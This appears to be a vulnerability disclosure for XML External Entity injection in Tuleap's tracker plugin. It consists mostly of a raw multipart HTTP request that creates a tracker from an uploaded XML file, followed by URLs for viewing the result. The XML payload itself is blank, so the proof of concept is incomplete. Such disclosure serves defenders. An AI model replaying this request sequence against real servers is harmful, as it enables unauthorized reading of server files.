The application was found vulnerable to External Entity Injection

Impact:

A authenticated user in position to exploit this issue would be able to read the files from the system and thus affect it’s confidentiality.

Exploit:

Step 1

POST /plugins/tracker/?group_id=102&func=create HTTP/1.1

Host: 192.168.56.105

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101

Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://192.168.56.105/plugins/tracker/?group_id=102&func=create

Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4;

TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79

Connection: keep-alive

Content-Type: multipart/form-data;

boundary=---------------------------12077103611061

Content-Length: 25588

-----------------------------12077103611061

Content-Disposition: form-data; name="group_id"

102

-----------------------------12077103611061

Content-Disposition: form-data; name="func"

docreate

-----------------------------12077103611061

Content-Disposition: form-data; name="group_id_template"

100

-----------------------------12077103611061

Content-Disposition: form-data; name="tracker_new_prjname"

Commencez à taper

-----------------------------12077103611061

Content-Disposition: form-data; name="create_mode"

xml

-----------------------------12077103611061

Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"

Content-Type: text/xml

-----------------------------12077103611061

Content-Disposition: form-data; name="name"

Bugs

-----------------------------12077103611061

Content-Disposition: form-data; name="description"

Bugs Tracker

-----------------------------12077103611061

Content-Disposition: form-data; name="itemname"

bug

-----------------------------12077103611061

Content-Disposition: form-data; name="Create"

Créer

-----------------------------12077103611061--

Step 2

https://192.168.56.105/plugins/tracker/?group_id=102&tracker=12

or

https://192.168.56.105/plugins/tracker/?tracker=12&func=admin-formElements